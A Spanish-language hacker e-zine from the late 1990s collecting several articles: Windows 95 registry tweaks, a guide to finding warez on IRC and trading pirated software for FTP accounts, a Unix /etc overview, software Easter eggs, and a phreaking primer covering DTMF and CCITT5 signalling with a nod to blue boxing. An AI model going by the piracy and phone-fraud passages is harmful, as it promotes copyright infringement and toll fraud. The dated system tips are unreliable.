cansado de ese maldito icono de mi PC, lo puedes cambiar sin mucho esfuerzo.

En las seccion de HKEY_CLASSES_ROOT busca el directorio CLSID dentro de este
directorio hay una carpeta llamada {20D04FE0- etc...} expande esta carpeta y
encontraras una seccion llamada "DefaultIcon" haz click sobre esta
carpeta y haz doble click en donde dice"(Predeterminado)" y ahi pon la ruta y
el nombre del icono que quieras que aparezca.

Para el Icono de la papelera de reciclaje es un proceso parecido,solo que
aqui tienes que cambiar 2 iconos, uno cuando la papelera esta llena y otro
cuando esta vacia.
Veamos... Primero vacia tu papelera despues ve hacia esta direccion.

HKEY_CLASSES_ROOT/CLSID/{645FF040- etc..}/DefaultIcon

Aqui hay tres opciones"(Predeterminado)","(Empty),"(Full)" igual que como
cambiaste el icono de MiPC haz doble cick en estos valores y cambia la ruta y
el nombre del icono de tu agrado. El valor que utilices para (Predetarminado)
debe ser el mismo que tenga el valor de (Empty).
NOTA. Puedes cambiar el nombre de tu papelera dando un click en la carpeta
"{645FF040- etc..}" y despues doble click en "(Predeterminado)"

De la misma forma puedes cambiar el icono de entorno de red que se encuentra:
HKEY_CLASSES_ROOT/CLSID/{208D2C60- etc..}/DefaultIcon

o Bandeja de Entrada:
HKEY_CLASSES_ROOT/CLSID/{00020D75- etc..}/DefaultIcon

o Microsoft Network:
HKEY_CLASSES_ROOT/CLSID/{00028B00- etc..}/DefaultIcon

o El catstrante Internet Explorer:
HKEY_CLASSES_ROOT/CLSID/{FBF23B42- etc..}/DefaultIcon

-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-

Si tienes una version anterior a Win95 OSR2 puedes optimizar tu sistema de la
siguiente forma:

Primero edita otravez el registro y en esta direccion:
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\FS Templates\Server

Cambia a los siguientes valores:
NameCache debe tener el valor de a9 0a 00 00
PathCAche debe tener el valor de 40 00 00 00

Ya que hayas echo estos cambios, en "Propiedades del Sistema", dentro de
"Rendimiento" escoje "Sistema de archivos" y cambia el valor de "PC de
escritorio" a "Servidor de red".

Puedes tambien poner al maximo "Tama¤o de Cache Suplementario" para aumentar
el bufer de lectura para el CD-ROM.

Otro paso muy recomendable es definir un archivo de memoria virtual en tu
sistema, esto se hace en la seccion de Memoria Virtual y ahi escoje la
opcion "Permitir especificar la configuracion de memoria virtual", asigna
como minimo el el doble de memoria RAM que tengas en tu sistema y como maximo
lo que quieras. Esto creara un archivo en tu disco duro con extencion .swp

Si te hace falta espacio en tu dico duro puedes liberar un poco de este
eliminando todos los archivos con extenxion *.chk o *.tmp, tambien te
recominedo borrar los archivos *.bmp del papel tapiz de tu sistema que no
ocupes, los dise¤os de fondo tambien los puedes eliminar asi como la
combinacion de la apariencia de tu escritorio que no te gusten, un paso mas
es asignarle menor espacio a la papelera de resiclaje, la cual asigna el 10%
del espacio de tu disco, esto lo puedes modificar desde las propiedades de la
papelera de resiclaje seleccionando la opcion "Configurando unidades
independientemente" y en la pesta¤a donde este tu dico duro mover el cursor al
espacio que quieras (lo recomendable es el 5%). Un paso mas es eliminar las
cokies que se cargan en tu disco, desde Internet por lo general son archivos
con extension *.txt.

"Kill the System!"
12r.
____________________________________________________________________________
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
^*^*^*^*^*^*^*^*^*^*^*^*^*^*^
*^ ^*
*^ COMO CONSEGUIR WAREZ... ^*
*^ ----------------------- ^*
*^ ^*
^*^*^*^*^*^*^*^*^*^*^*^*^*^*^

WaReZ RuLeZ
~~~~~~~~~~~

Bueno primero mover vuestro culo a efnet o undernet para pillararos listas !!!!
Eso listas de ftp's donde hay soft y eso claro. !!!En que canales COMO? Pues
en undernet y en efnet en canales como #warezwarez y #zeraw ,etc. hay mas solo
tienes que hacer un listado de canales y fijarte en el topic. Una vez dentro
pues te pillas la lista y quedate un rato y tal chatea mira los anuncios de
web's y eso. Quieres calidad de listas ? Pues segun lo que he visto en mejor
canal de warez qye he visto es #wareztalk de efnet o en warez_talk de undernet
tiene sucursales XDDDD pues hay no te dan las listas por la cara tienes que
postear un site osea un FTP.
Eso que es?? Pues en el topic del canal o el bot te dira o te mostrara en el
canal. To get the largest *VERI FIED* list of sitez compiled from the Undernet,
Efnet and NewNet, POST a site to me, Sitez98, by typing: /msg Sitez98 POST ##.
###.##.### /warezpath l:ogin p:assword. We now accept MP3 Sites as: /msg
Sitez98 MP3 ##.###.##.### /mp3path l:ogin p:assword Si es de warez el site que
posteas pues pones POST si es de M P3 pues MP3 luego pones el la ip del ftp en
numeros no accep tan letras luego el directorio el l/P si es anonimo lo tienes
que decir pones L:anonymus P:Lamer@aol.com . TOP SECRET Pero Que Pasa si
quieres un site permanente una cuenta privada en uno de ellos osea un distro
personal donde tener lo ultimo en warez?¨?¨?¨? Pues aqui tieenees el SECRETO!!!!!
1) Primero saber utilizar el fxp, lo podreis encontrar en las siguientes web's:
powr.islatortuga.com !!! Con un manual del FXP!! 2) Encontrar un sitio que te
guste osea un ftp que hayas visto cosas que te molen. 3) Subir de los sites
temporales al ftp que te gusta a lo bestia , UTILZANDO EL FXPEO. 4) Crear en
el directorio del ftp que te gusta un directorio con tu nick y dejar hay las
cosas. 5) Seguir llenando el ftp que te guste hasta que te cansas hasta que lo
llenes ;) Una cosa el fxpeo no te reduce ancho de banda. 6) Llegara un momento
que el sys op del FTP el due¤o y tal dira quien co¤o es eeste , joder me llena
el FTP me lo llena y casi no baja. 7) Luego de haberle llenado el ftp o haber
dejado muchas cosas sobretodo no dejes mierda mira haber que le falta o fijate
en los directorios que pone plz tal programa o date un rulo por el ftp y mira
que tiene el y que le puedes poner tu que mole si dudas pon lo que te salga de
los huevos. 8) Dentro del directorio de los uploads el que has creado con tu
nick crea un directorio diciendo " soy fulanito de tal (nick) y me gustaria
tener una cuenta en tu sitio" le dejas el E-mail y tal o puedes dejarle un
leemee.txt diciendo los mismo o un txt con el nombre que te salga de los
huevos Pero en INGLES. o en algunos ftp's al entrar te pone E-MAil del sysop ,
le puedes enviar un mail diciendole lo mismo 9) Ten por seguro que es una
inversion el SECRETO esta en no pillar si no dejar durante un tiempo y ten por
seguro quee el sysop te dara una cuenta en el ftp. Mira tu que lees en estos
momentos por lo que veo la pe¤a solo gorrea y no deja eso trae unas
consecuencias que la gente tenga menos ganas de abrir su ftp y tal ... Ademas
eso de solo pillar y no dejar es de lamer's eso. Ok Pero a mi no me sale de
los huevos acerte caso !!!! pues solo te pido que si teee pillas por ejemplo 5
mp3 que dejes uno que no te cuesta nada , HAZLO PLZZZ aunque solo se ha por
AM OR AL WAREZ. Por cierto, no se gente pero mucho warez USA y poco warez
spain no se si captas melon, por ejemplo el frontpage 98 = joder esta en todos
lados en ingles pero en castellano ufff se pueden contar con los dedos de las
manos , Captas PROBLEMA INMENSO !!!! HABER si de una puta vez hay ftp's warez
con soft en castellano , oye pero tu el que lee's , hostia estudias en una
universidad y tal ... que tal si hablas con el root de tu uni y le dices
capukko atento !! ahora mismo habra el FTP y tal ... y me dejas meter software
en spain que quiero abrir una FTP warez y estar a la onda ok? captas !!! Nota
decirselo con tacto .jejejejej By Sergii Este txt no hubiera sido posible si
no fuera por BOSS y FreaKs. Muchas Gracias a los dos y Saludos. I TU EL QUE
LEES RECUERDA AMA Al Warez y te sera propicio XDDDD
____________________________________________________________________________
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
-.-.-.-.-.-.-.-.-.-.-.-.-.-.-
- UNIX: Sistema de archivos -
-.-.-.-.-.-.-.-.-.-.-.-.-.-.-

Los directorios por defecto de cualquier sistema Unix son los siguientes:

______________
| / (root) |
___|______________|
____/ ____/ _/ / | \ \
___/ ____/ __/ / | \ \__
___/ ___/ __/ / | \ \__
____/ ___/ __/ / | \ \__
____/ ___/ __/ | | | \__
____/ ___/ __/ / | \ \__
____|_ __|___ ___|_ ___|_ ___|_ __|__ ___|___
| mail | | sbin | | usr | | dev | | var | | etc | | home |
|______| |______| _|_____| |_____| |_____| |_____| |______|
__/ / | \ \__ _/ / |
__/ / | | \_ _/ | |
__/ / | \ \__ _/ / \
_/ | | | \_ _/ | |
__/ / | \ \_ _/ | |
____|_ ___|_ ___|_ _|___ _|_____ _____|_ ____|__ _|___
| sbin | | bin | | lib | | man | | spool | | user1 | | user2 | | ... |
|______| |_____| |_____| |_____| |_______| |_______| |_______| |_____|


Y ahora una breve descripcion:

/ Comienza el sistema de archivos. Se conoce como directorio
raiz.
/home Contiene los directorios propios de los usuarios (en este caso
solamente habrian dos usuarios - user1 y user2).
/mail Contiene los directorios de correo de los usuarios.
/bin Contiene todas las ordenes estandar y los programas de utili-
dad.
/usr Contiene los archivos y ordenes usados por el sistema. Este
directorio se compone de varios subdirectorios:
/bin Contiene las ordenes orientadas a los usuarios y los programas
de utilidad.
/sbin Contiene las ordenes de administracion del sistema.
/lib Contiene las bibliotecas de los lenguajes de programacion.
/doc Contiene documentacion de Unix.
/man Contiene los archivos del manual interactivo 'man'.
/spool Contiene archivos en formato spool, tales como los que se ge-
neran para imprimir tareas y hacer transferencia en redes.
/sbin Contiene ordenes de administracion para arrancar el sistema.
/var Contiene archivos 'variables' (que pueden varias) como los ar-
chivos 'mailbox' (buzon).
/dev Contiene interfaces de archivo para dispositivos tales como el
terminal y la impresora.
/etc Contiene archivos de configuracion del sistema y cualquier o-
tro archivo de sistema.


Si ya estas familiarizado con el sistema Unix habras observado que el directo-
rio /etc es uno de los mas importantes dado el papel que juega en el sistema.
Como ya he dicho antes, contiene todos los archivos de configuracion del sis-
tema, por lo que si alguien tuviera acceso de escritura podria causar un caos.
Bueno, eso de tener acceso de escritura lo dejo en vuestras manos. Yo simple-
mente os voy a detallar para que sirven los ficheros mas importantes:

/etc/inittab Establece el estado por defecto asi como las conexiones de los
terminales.
/etc/passwd Contiene las configuraciones de las contrase¤as y de entradas
de usuario (naturalmente, encriptados).
/etc/shadow A veces, la contrase¤a del fichero anterior se encuentra aqui.
Para una mayor seguridad del sistema.
/etc/group Contiene una lista de grupos con las configuraciones de cada
uno.
/etc/fstab Monta automanticamente los sistemas de archivos cuando inicia
el sistema (te evita el hacer los 'mount' manualmente).
/etc/printcap Contiene una lista de cada una de las impresoras y de sus res-
pectivas especificaciones.
/etc/termcap Contiene una lista de las especificaciones de los tipos de
terminales que peden ser conectados al sistema.
/etc/gettydefs Contiene informacion de la configuracion de los terminales que
estan conectados al sistema.
/etc/skel Es el directorio que contiene las distintas versiones de los
archivos de inicializacion, tales como '.bash_profile' que son
copiados en los directorios propios de los nuevos usuarios.
/etc/shell Contiene los shell de usuario, tales como BASH o TCSH.
/etc/ttys Presenta una lista de los dispositivos de terminales y de los
dispositivos de terminales con los cuales se corresponden.

Archivos de inicializacion del sistema:

/etc/rc.d Directorio que contiene los archivos de inicio y cie-
rre del sistema.
/etc/rc.d/rc.sysinit Archivo de inicializacion del sistema.
/etc/rc.d/rc.local Archivo de inicializacion de sus propias ordenes. Pue-
des editar libremente este archivo para a¤adir tus
propias ordenes de inicio. Es el ultimo archivo de i-
inicio que es ejecutado.
/etc/rc.d/init.d Directorio que contiene muchos de los archivos de ini-
cializacion que sirven para iniciar y cerrar varios
programas demonio (daemon).
/etc/rc-d/init.d/halt Indica las operaciones que se han de realizar cada vez
que cierra el sistema, tal y como desmontar sistemas
de archivo. Tambien se puede ver como 'rc.halt'.
/etc/rc-d/init.d/
lpd.init Iniciar y cerrar el programa demonio 'lpd'.
/etc/rc-d/init.d/inet Inicia las operaciones para establecer las interfaces
de redes y el programa demonio 'inet' Llama al archi-
vo 'networks'.
/etc/rc-d/init.d/
httpd.init Inicia las operaciones para iniciar y cerrar el pro-
programa demonio servidor de Web, 'httpd'.
/etc/rc-d/init.d/
cfs.init Indica las operaciones para iniciar y cerrar el servi-
dor.
/etc/rc-d/init.d/ipx Indica las operaciones para iniciar y cerrar el pro-
grama demonio servidor de IPX de NetWare.


ú-= GuyBrush =-ú
____________________________________________________________________________
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~


 \  / 
 Por: Cytorax \ ® EASTER EGGS ¯ / Cytorax@BigFoot.com 
 \  / 

 http://members.xoom.com/cytorax/index.html 
 http://members.tripod.com/~cytorax/index.html 


 INTRO
Gracias a la oportunidad que me dieron de escribir en esta revista, aqui me
presento soy Cytorax y espero que este articulo les agrade ya que es la primer
vez que soy escribo para una revista pero en fin.

 EASTER EGGS (HUEVOS DE PASCUA)
Un Easter Egg es un secreto o fucion de un programa dise¤ado para divertir.
El uso mas popular que le dan al Easter Egg los programadores es para esconder
sus nombres dentro de la aplicacion, provocando a todos nosotros el hacer
cosas extra¤as para descubrirlos. Dicen por ahi que los iniciadores de todo
esto fueron los programadores de Atari, despues los de Microsucks siguieron
con todo esto.

 PROGRAMAS CON EASTER EGGS
Dentro de los programas que conocemos los Easter Eggs se encuentran mas
comunmente en los de Microsucks y otros pocos en algnos otros programas,
a continuacion les hago un listado con los programas en los cuales puedes
encontrar Easter Eggs.
-Acces
-Word
-Excel
-Power Point
-Windows 95
-Netscape
-ACDSee
-After Dark
-Ami Pro
-C++ Builder
-Corel Draw
-Delphi
-Eudora
-FrontPage 97
-Illustrator
-Lotus Notes
-Microsoft Chat
-Internet Explorer
-Netscape Communicator
-MIRC
-Quick Time 32 for Windows
-Photoshop
-Turbo Pascal
-Windows 31
-Windows NT
-Windows Wine
-Y otros mas........................

 AHORA SI, LOS EASTER EGGS (CON EXPLICACION DETALLADA)
Creo que ya estan desesperados por conocer algunos de los Easter Eggs asi
que empezemos de una vez, a continuacion esta escrito arriba los nombres de
los programas con mayusculas y cada paso esta indicado por un numero, facil
¨NO?, bueno adelante.

(((Access)))
1.- Crea una nueva tabla llamada "cirrus" (sin las comillas).
2.- Selecciona Help / About.
3.- Manten presionado [Ctrl]+[Shift] y da doble click en el logo con el boton
derecho del mouse para ver una animacion con los creditos.

1.- Crea cuatro nuevas tablas llamadas "a", "cc", "e", "ss" (sin las comillas).
2.- Selecciona Help / About.
3.- Manten presionado [Ctrl]+[Shift] y da doble click en el logo con el boton
derecho del mouse para ver un rompecabezas.

1.- Selecciona Tools / Security / User and Group Accounts.
2.- Da click en "New User".
3.- En el campo User Name, teclea "Pioneer" (sin las comillas).
4.- En el campo Personal ID, teclea "092595" (sin las comillas).
5.- Da click en OK para ver los creditos.
______________________________________________________________________________

(((ACDSee)))
Tama¤o
1.- Presiona "*" en el Teclado Numerico mientras estas viendo la imagen
que aparecera in el pantalla.

Scrolling
1.- Manten presionado Ctrl mientras usando las flechas del teclado mueves
una imagen. Con Shift se mueve lento.

Show De Diapositivas
1.- Para empezar, deten y resume las diapositivas, pressiona Ctrl and s.
Todas las imagenes del directorio estaran incluidas en la presentacion.
______________________________________________________________________________

(((After Dark)))
1.- Selecciona el Modulo "Messages 4.0"
2.- Acomoda a tu gusto el mensaje y escribe: "~" (tilde, sin las comillas).
3.- Activa el protector de pantalla para ver a una mano dibujar una cara.
______________________________________________________________________________

(((Ami Pro)))
1.- Selecciona Help / About.
2.- Manten presionado [Ctrl]+[Alt]+[Shift].
3.- Presiona [F7], luego S, P, A, y M.
4.- Teclea el ultimo digito de lo que dice en Available Memory, seguido
por el tercer al ultimo digito para ver fotos de los programadores.
______________________________________________________________________________

(((C++ Builder)))
1.- Selecciona Help / About.
2.- Manten presionado [Alt] y presiona "T" o "D" (sin las comillas) para ver
los creditos.
______________________________________________________________________________

(((Corel Draw)))
1.- Desde el menu de ayuda, selecciona About. Da doble click sobre uno de los
iconos. Ahora tu podras ver un globo de Corel y una mano con una palanca.
Da click con el boton derecho y mantenlo. El globo ascendera.
Si das otro click veras algo divertido y asi consecutivamente cada vez que
des click en horas diferentes y dias tambien.
______________________________________________________________________________

(((Delphi)))
1.- Selecciona Help / About.
2.- Manten presionado [Alt] y teclea "TEAM" (sin las comillas) para ver los
creditos.
______________________________________________________________________________

(((Excel)))
1.- En una nueva hoja, muevete a la celda B95.
2.- Selecciona Help / About.
3.- Manten presionado [Alt] y [Shift], luego da click en "Troubleshooting"
para entrar a The Hall Of Tortured Souls.
4.- Teclea "excelkfa" para abrir un area secreta.

1.- En una nueva hoja, presiona F5 para saltar a una celda.
2.- Teclea X97:L97 y da click en OK.
3.- Presiona [Tab].
4.- Y luego manten presionado [Ctrl]+[Shift] y da click en Chart Wizard
que esta en la barra de herramientas.
______________________________________________________________________________

(((Eudora)))
1.- Ve a Help y About Eudora...
2.- Luego selecciona More Credits.
3.- Manten presionado Ctrl para algo divertido.
______________________________________________________________________________

(((FrontPage 97)))
1.- Arranca FrontPage Explorer.
2.- Manten presionado Shift mientras seleccionas Help y About 3 veces.
3.- Da click en OK las primeras 2 veces.
______________________________________________________________________________

(((Illustrator)))
1.- Al fondo de la pantalla, hay un menu que te muestra la herramienta,
fecha y hora, memorya libre y numero de undos.
2.- Manten presionado Alt mientras das click en el para ver dias festivos.
______________________________________________________________________________

(((Lotus Notes)))
Version 4.0:
1.- Selecciona Help y About Notes. Teclea "elvis is not dead", todo en
minusculas. La cabeza de Ray Ozzie's saldra y mostrara los creditos.

Version 4.5:
1.- Selecciona Help y About Notes. Teclea "yes he is", en minusculas. Y la
cabeza de Ray Ozzie's saldra y mostrara los creditos.
______________________________________________________________________________

(((Microsoft Chat)))
1.- Teclea "CanThereBMore?" (Nopresiones Enter).
2.- Manten presionado Ctrl y Shift y presiona en el boton de Open Favorites,
o selecciona Open Favorites... desde el Favorites drop-down menu. Ahora
tu podras observar la caricatura de los caracteres bailar!
______________________________________________________________________________

(((Microsoft Internet Explorer)))
1.- Desde el Help menu, escoje "About Internet Explorer".
2.- Presiona Ctrl y da click en la "e" azul, y arrastralo (mientras mantienes
presionado Ctrl) a lo largo de la linea el globo y luego tomara el texto
"Internet Explorer" hacia la derecha. Un boton que dice "Unlock" sera
revelado da click en el.
3.- Finalmente presiona Ctrl y da click y mueve la "e" dentro del globo de nuevo.

1.- Teclea "about:mozilla" (recuerdas Netscape).
______________________________________________________________________________

(((MIRC)))
1.- Ve a la ventana del mIRC (help - about). Da click con el boton izquierdo
del mouse en la nariz de Khaled para oir un sonido.
______________________________________________________________________________

(((Netscape Communicator)))
1.- Primero ve al menu "Edit" y "Preferences".
2.- Abajo de la etiqueta del Navegador, da click en "Clear History".
3.- Salte de Netscape. en tu directorio de Netscape, encontraras un
archivo llamado prefs.js.
4.- Abrelo en un editor de texto. Mira cuidadosamente, y encontraras varias
lineas de "user_pref("browser.url_history.URL_2", "www.sharepaper.com");".
5.- Borra estas lineas. Y eso es todo.

1.- En el campo de URL, teclea:
about:cache - Muestra todos los archivos del cache.
about:global - Muestra todos los lugares que has visitado.
about:image-cache - Muestra todos los archivos imagen del cache.
about:justanytext - Muestra cualquier texto en el navegador.
about:memory-cache - Muestra todos los archivos en la memoria del cache.

1.- mozilla, marca, ari, atotic, blythe, chouck, dmose, dp,
ebina, hagan, jeff, jg, jsw, jwz, karlton, kipp, mlm,
montulli, mtoy, paquin, robm, sharoni, terry, and timm.

1.- Ctrl Alt f - Te lleva a Amazing Fish Cam!
Ctrl Alt s - Esconde la status bar.
Ctrl Alt t - Muestra un reporte de los URLs
______________________________________________________________________________

(((Photoshop)))
1.- Manten presionado [Alt].
2.- Selecciona Help / About para ver una foto de "Big Electric Cat".

1.- Antes de comenzar Photoshop, manten presionado [Alt].
2.- Arranca Photoshop para ver la foto de "Big Electric Cat" en la portada
del Photoshop.
______________________________________________________________________________

(((PowerPoint)))
1.- Selecciona Help / About.
2.- Mante presionado [Ctrl]+[Shift] y da click en el logo de PowerPoint para
ver los creditos con fuegos artificiales.

1.- Selecciona Help / About. Da click en el icono de PowerPoint. Y apareceran
los creditos.
______________________________________________________________________________

(((Quick Time 32 for Windows)))
1.- Abre QuickTime 32.
2.- Da click el logo de QuickTime, y una caja aparecera.
3.- Da click con el boton derecho del mouse en el logo y veras una imagen de
los programadores.
______________________________________________________________________________

(((Turbo Pascal)))
1.- En el IDE, selecciona Help / About.
2.- Manten presionado [Alt] y presiona [I] para ver los creditos.
______________________________________________________________________________

(((Windows 3.1)))
1.- Ve al Administrador de Programas.
2.- Manten presionado [Ctrl]+[Alt]+[Shift] y selecciona Help / About.
3.- Da doble click en el logo de Windows con el boton izquierdo del mouse.
4.- Da click en OK.
5.- Repite los pasos 2-4 para ver una animacion de una bandera de Windows y
varios miembros del grupo de programadores.
______________________________________________________________________________

(((Windows 95)))
1.- Crea una nueva carpeta en el Escritorio.
2.- Renombra a la carpeta con "and now, the moment you've all been waiting
for" (sin las comillas en todos los pasos).
3.- Renombra a la carpeta con "we proudly present for your viewing pleasure".
4.- Renombra a la carpeta con "The Microsoft Windows 95 Product Team!".
5.- Abre la carpeta para ver los creditos animados con sonidos.

1.- Da click en el boton de Inicio.
2.- Presiona [Alt]+[-] para ver las opciones del boton (lo puedes mover y
cerrar).
______________________________________________________________________________

(((Windows NT)))
1.- Selecciona 3D Text como screen saver.
2.- Cambia el texto a lo siguiente:

beer
Beers.
I like NT
Developers and testers, or message "Good".
I love NT
Developers and testers, or message "Good".
not evil
Developers and testers.
rock
Bands.
volcano
Volcano names.
______________________________________________________________________________

(((Windows Wine)))
1.- Arranca la guia Wine.
2.- Manten presionado Ctrl y Shift mientras tecleas "redmond". Desde el menu
de Help, selecciona About Wine Guide.
3.- Da doble click en el bote de wine. El corcho saltara.
4.- Da doble click en el corcho y una ventana se abrira, mostrando fotos de
Bill Gates sin su playera en un picnic con su compa¤ia y escucharas la
cancion de Pretty Woman.
______________________________________________________________________________

(((Word)))
1.- Activa el Caps Lock.
2.- Selecciona Format / Define Styles / Options.
3.- Selecciona "Normal" en la caja "Based On".
4.- Presiona OK.
5.- Da click en Cancel.
6.- Selecciona Help / About.
7.- Presiona O, P, U, y S en el teclado al mismo tiempo mientras el mouse
esta en blanco para ver los creditos con fuegos artificiales.

1.- Selecciona Tools / Macro.
2.- Teclea "spiff" como nombre del macro.
3.- Borra todas las lineas del macro.
4.- Selecciona File / Close y cuando pregunte que salvar los cambios,
selecciona "Yes". Luego selecciona Help / About.
5.- Da click en el logo de Word y ve una historia.

1.- En un nuevo documento, teclea "T3!" (sin las comillas) en negritas.
2.- Selecciona Format / AutoFormat y da click en OK, luego Accept.
3.- Selecciona Help / About.
4.- Da click en el logo de Word para ver los creditos.

1.- Teclea "zzzz" (sin las comillas) en un documento.
2.- Selecciona las "zzzz".
3.- Corre el corrector ortografico para ver un sugerencia extra¤a.

1.- Teclea en un nuevo documento "Credits://where's.karen's.brother?"
(sin las comillas)
2.- Selecciona Help / About.
3.- Da click en el dibujo para ver los creditos.

1.- En un nuevo documento teclea "Blue" (sin las comillas), luego
seleccionalo.
2.- Pon en negritas el texto y cambialo a color azul.
3.- Pon un espacio despues de la palabra "Blue".
4.- Selecciona Help / About.
5.- Manten presionado [Ctrl]+[Shift] y da click en el logo de Word para
entrar en un juego de pinball.

1.- Ve a Help / About.
2.- Manten presionado Ctrl y Shift izquierdo, mientras das click en el icono
de Word.
3.- Ahora, podras ver los creditos.
______________________________________________________________________________

 DESPEDIDA
Ya terminado mi articulo solo me queda despedirme de los lectores de esta
revista, gracias por su atencion y recuerden cualquier duda o comentario
escriban contestare con mucho gusto y tambien si tienen un Easter Egg que no
mencione.
Ha y recuerden "VIVAN LA VIDA".

 MI LLAVE PGP
Si desconfian de las comunicaciones que tenemos aqui les dejo mi llave PGP
por si las dudas.
ÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜ

Tipo Bits/Clave Fecha Identificador
pub 1024/2D23674D 1997/12/03 Cytorax <Cytorax@bigfoot.com>

-----BEGIN PGP PUBLIC KEY BLOCK-----
Version: 2.6.3ia

mQCNAzSFCWgAAAEEAMfbmLIFrwArZmk6mM9B1kDJb9TFWpBpF5GoWfZyZvqlOMV0
e/0ngWnisCQcbZy42knU3brXuwyOzyRZ4DrfPfnGmShx8FpEM/uCszQYF00JQsWD
95Emq1I5d0V+BUAtoaMeCZn6dU5sgteImgIAxDR5lx4r8yWq70jBPfwtI2dNAAUR
tB1DeXRvcmF4IDxDeXRvcmF4QGJpZ2Zvb3QuY29tPokAlQMFEDSFCWlIwT38LSNn
TQEBSeoEAMBzsNwdq1A4EXT9ZkEwgSCeLofv7rUoJn4w75FvEBCfofijDWUwCkQJ
FHGwcnAW4xg0wJzs4MByjSEvLnxCB++BmwGM6l8/NiyrolDk7rnOaHI1tU0wcCmz
oNhHQdrfL0zmRNlR5QvXqlPnRxCB/GgLXLyrJGtvoDtv6U3SaL4s
=Xw7I
-----END PGP PUBLIC KEY BLOCK-----

ÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜ

____________________________________________________________________________
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

³ Antes de ser Phreaker ³
³ por El Emperador ³

Saludos a todos, cultura rasta. Drogas para sentirse bien, no para ser mas
violentos, eso es gueno, no pensar en uno mismo, pensar tambien en los
demas, principalmente en los desafortunados.
Quiero parlar un rato de phreaking, asi que si en algun momento no te gusta
lo que digo, deja de leer lo que escribo. [aunque lo escribo de onda]
Que es phreaking?, es una forma de cagar a las putas empresas multinacionales
extranjeras de telefono, para vengar, en menor medida, al pueblo que RESISTE!.
Logrando una forma mas 'formal' la definicion es "utilizacion de telefonos
para la experimentacion y el conocimiento".
Algunos lo usan o usaron para beneficios economicos personales, otros no.
Es algo complicado empezar por algo, que se yo, el tema es groso.

Entre dos clientes, Diego y Armando hay muchos artefactos que intermedian.
Diego quiere llamar por telefono a Armando, que vive en la misma ciudad,
pero a muchas cuadras de distancia.
Lo separan cajas de distribucion, filtros, las "centrales origen/destino"...
Al levantar el tubo, por la linea de telefono (que en ese momento estaba
en 48v) pasan 10v. La central origen espera que el origen, Diego, marque
en su telefono el numero de Armando, destino. Diego puede marcar por tono o
por pulso. Si tiene el viejo telefono a disco, entonces solo puede llamar
por pulso, y si tiene el de tono, puede marcar por tono o por pulso, segun
el telefono este seteado (SISISI!!!, esa palanquita atras, al lado del
volumen).
Esperen que quiero ver hasta donde crecio la Juana....
una hojita menos.....
sssssssssssss.....satisfaction ð|->
Listo fieras!!!!. quede ahi, bueno. decia que por tono puede marcar y la
central no capta mas que sonidos y beepes de determinadas frecuencias y
duracion.
Cada teklita del telephono al apretarla manda 2 frecuencias, las clasicas
denominadas DTMF (Dual Tone Multi Frequency).
La tabla DTMF

HZ 1209 1336 1477 1633

697 1 2 3 A

770 4 5 6 B

852 7 8 9 C

941 * 0 # D

ej.
Si apretas el uno manda primero una frecuencia de 1209 hz y despues 697 hz a la
central origen (tu central).

i.e
If you press the number one this send first a freq of 1209 hz and after 697 hz
to the origin central (your central).

Entre centrales hay determinados tipos de se¤alizacion.
Entre centrales de Argentina se usa CCITT7 o SS#7. [por tal motivo me olvide
de la black box].
Entre centrales de Argentina y Chile se usa la ccitt5, por lo cual se puede
hacer blue boxing ;)
Otra tablita, la de ccitt5, gentileza de Cut and Past
700 : 1 : 2 : 4 : 7 : 11 :
900 : : 3 : 5 : 8 : 12 :
1100 : : : 6 : 9 : KP :
1300 : : : : 10 : KP2 :
1500 : : : : : ST :
: 900 : 1100 : 1300 : 1500 : 1700 :

Entre centrales extranjeras se usa la ccitt5.
Antes en Estados Unidos entre las centrales locales se usaba ccitt5, con lo
que para hacer blue boxing solo se pagaba llamada local, porque no era muy
"comun" que existan 800's. Ahora los hay por doquier (por todos lados).
En otros paises tambien se usaba, ahora, la verdad, no se, si ustedes saben
me chiflan. [el-emperador@mailcity.com]

Bueno, rapidamente la informacion (datos procesados) llega a la central
destino, esta la convierte para que el telefono de Armando la pueda
interpretar y el telefono de Armando suena (RING!!!!).
Armando levanta el tubo, pregunta quien es el que esta del otro lado y
empieza a hablar con Diego. [cuando paso a buscar el papelito?]
Despues Armando corta, pero hasta que Diego, o sea, origen, no corte, la
comunicacion no ha terminado.
Hay algunas centrales en las que la comunicacion se termina cuando cualquiera
de los dos corta (0800).


Cada numero de abonado se divide en 2 partes. XX-XXXX
Ejemplo 8 0 - 2 5 5 7
Los 2 primeros numeros (8y0) es para describir la central, la identificacion
de la central a la que esta conectado el abonado.
Los 4 siguientes numeros (2,5,5y7) son el numero del abonado, la direccion
telefonica.
En algunos lugares superpoblados (como Buenos Aires) el numero de central
son 3 y no 2 como en Rosario u otras ciudades sin tantos habitantes (*).
Ej. 766-2557 { !!!NUMERO INEXISTENTE!!! }
Si se desea identificarlo desde otro lugar del planeta, se usan los numeros
de Codigo de Pais, Codigo de Area o Ciudad y el de Central y el de abonado.
Si se quisiera llamar desde China a Rosario, la "direccion telefonica" del
81-9188 seria:
+54 (041) 81-9188.
Donde +54 es el codigo de pais (en este caso Argentina) 041 el de area (en
este caso ciudad de Rosario) y el resto ya lo explique antes.

Bueno, tendria que explicar las conexiones de los telefonos ?
